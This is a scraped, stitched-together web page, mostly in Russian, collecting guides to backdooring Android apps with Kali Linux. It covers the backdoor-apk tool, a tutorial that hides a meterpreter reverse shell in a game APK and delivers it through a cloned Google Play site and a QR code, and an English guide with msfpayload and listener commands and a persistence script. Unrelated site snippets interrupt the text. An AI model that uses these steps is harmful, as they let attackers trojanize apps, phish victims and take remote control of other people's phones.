Kali linux backdoor android

Инструменты Kali Linux

Список инструментов для тестирования на проникновение и их описание

backdoor-apk

Описание backdoor-apk

backdoor-apk – это шелл скрипт, который упрощает процесс добавления бэкдора в любой APK файл для Android.

Программа поставляется со сторонними компонентами android-sdk-linux, apktool и proguard5.2.1.

Автор: Dana James Traversie

Справка по backdoor-apk

./backdoor-apk.sh оригинальный.apk

У программы нет справки и только одна опция – имя первоначального файла APK, в который будет зашит бэкодр. Изменить настройки вы можете в первых строках файла backdoor-apk.sh. В них вы можете задать IP адрес и порт для связи с Metasploit, пути до сторонних модулей, имя «файла-крысы», путь до лога и некоторые другие опции:

MSFVENOM=msfvenom LHOST="10.6.9.31" LPORT="1337" DEX2JAR=d2j-dex2jar APKTOOL=third-party/apktool/apktool PROGUARD=third-party/proguard5.2.1/lib/proguard DX=third-party/android-sdk-linux/build-tools/23.0.3/dx MY_PATH=`pwd` ORIG_APK_FILE=$1 RAT_APK_FILE=Rat.apk LOG_FILE=$MY_PATH/run.log

Руководство по backdoor-apk

Примеры запуска backdoor-apk

Внедрить бэкдор в APK файл (BaiduBrowser.apk):

root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk [*] Generating reverse tcp meterpreter payload. done. [+] Handle the meterpreter connection at: 10.6.9.31:1337 [*] Decompiling RAT APK file. done. [*] Decompiling original APK file. done. [*] Merging permissions of original and payload projects. done. [*] Running proguard on RAT APK file. done. [*] Decompiling obfuscated RAT APK file. done. [*] Creating new directories in original project for RAT smali files. done. [*] Copying RAT smali files to new directories in original project. done. [*] Fixing RAT smali files. done. [*] Locating smali file to hook in original project. done. [*] Adding hook in original smali file. done. [*] Recompiling original project with backdoor. done. [*] Signing recompiled APK. done. root@kali:~/Android/evol-lab/BaiduBrowserRat#

Перекомпилированный APK вы найдёте в директории ‘original/dist‘. Установите этот APK на совместимое устройство Android, запустите его, и управляйте подключением meterpreter на указанном IP и порту.

Установка backdoor-apk

Установка в Kali Linux

sudo apt-get install lib32stdc++6 lib32ncurses5 lib32z1 git clone https://github.com/dana-at-cp/backdoor-apk.git cd backdoor-apk

Информация об установке в другие операционные системы будет добавлена позже.

Скриншоты backdoor-apk

Это утилита командной строки.

Инструкции по backdoor-apk

Ссылки на инструкции будут добавлены позже.

Источник

Статья Взлом Android — устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

Читайте также:  Jdbc driver linux oracle

upload_2016-12-5_13-26-37.png

Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

upload_2016-12-5_13-27-3.png

Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1

upload_2016-12-5_13-27-30.png


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.

Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

upload_2016-12-5_13-29-42.png

upload_2016-12-5_13-30-4.png

Затем скопируем файл в папку с установленным Backdoor-apk.

upload_2016-12-5_13-30-20.png

Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

upload_2016-12-5_13-30-55.png

Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

upload_2016-12-5_13-31-17.png

Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist

upload_2016-12-5_13-31-53.png

upload_2016-12-5_13-31-59.png


На этом пока остановимся.

Пришло время запустить SET — Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:

> setoolkit

Выбираем:

upload_2016-12-5_13-32-59.png

Выберем Website Attack Vectors.

upload_2016-12-5_13-33-17.png

Нас интересует HTA – Attack Method.

upload_2016-12-5_13-33-53.png

Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store

upload_2016-12-5_13-38-50.png


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

upload_2016-12-5_13-39-52.png

Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

Читайте также:  Jupiter notebook для linux

upload_2016-12-5_13-40-34.png

Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

upload_2016-12-5_13-41-38.png

Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

upload_2016-12-5_13-42-7.png

На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

upload_2016-12-5_13-42-29.png

Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

upload_2016-12-5_13-42-51.png

Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

upload_2016-12-5_13-43-11.png

Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

> msfconsole –r backdoor-apk.rc

upload_2016-12-5_13-43-39.png

upload_2016-12-5_13-44-4.png

В консоли получаем активную сессию meterpreter.

upload_2016-12-5_13-44-20.png

На этом все, спасибо за внимание.

Источник

Create a Persistent BackDoor in Android Using Kali Linux

In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.I finally found out a way to do this, as I was/am very poor in bash scripting, I took much time (20hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found out from other sites.

Step 1: Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.

I’ll be hacking on WAN, using a VM.

  • Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk

  • Now, lets set-up a Listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit

After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up…

Step 2: Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh(The file extension .sh is important!)

——————————————————————————————————–
#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
——————————————————————————————————–
(Don’t copy these lines “—–” also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)

Move/Copy this to the Home/Root folder of KALI.

——————————————————————————————————–
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON’T WORK /!\
..I guess, you will have to write it on your own.. (Don’t ask me why..)
Code:
——————————————————————————————————–
#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
——————————————————————————————————–
There is a ‘space’ between ‘while’ and ‘:’
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Читайте также:  Linux посмотреть подключения tcp

Step 3: Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even afterReboot!
To do this, navigate to the directory using the following commands:

Now you should be in the ROOT directory, you can check by typing:

Time to Upload the Shell Script:

What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:

Step 4: Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system’s shell by typing:

Now, navigate to the location of the script:

Now its time for EXECUTION. Type:

The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don’t worry the script is still running)Reboot to eliminate the script or use Task Killer

Step 5: Testing…

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:

Wow! It happened so Fast that 3 sessions got opened one after another.(I know that the above picture shows that I am hacking on LAN instead of WAN as my Public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed t on LAN, BUT no worries I have tested it on WAN, works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

  • The persistence of the backdoor will only remain until a reboot of the android system.
  • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
  • Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
  • If the Victim’s Android system is Rooted and your Public IP is Static, then:

1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously

Video: Kali Linux (Metasploit) – Creating a Backdoor Undetectable by Antivirus + Keylogger

Also See:

How Hackers Hack Your Gmail
Kali Linux – How to use Armitage

Ibrahim Husic is a young Information Systems Security Engineer. He started with penetration testing when he was 16 years old. It all started with Kali linux and Metasploit. He was two times in newspaper for hacking. In free time he investigates security holes and solves them.

Источник

Оцените статью
Adblock
detector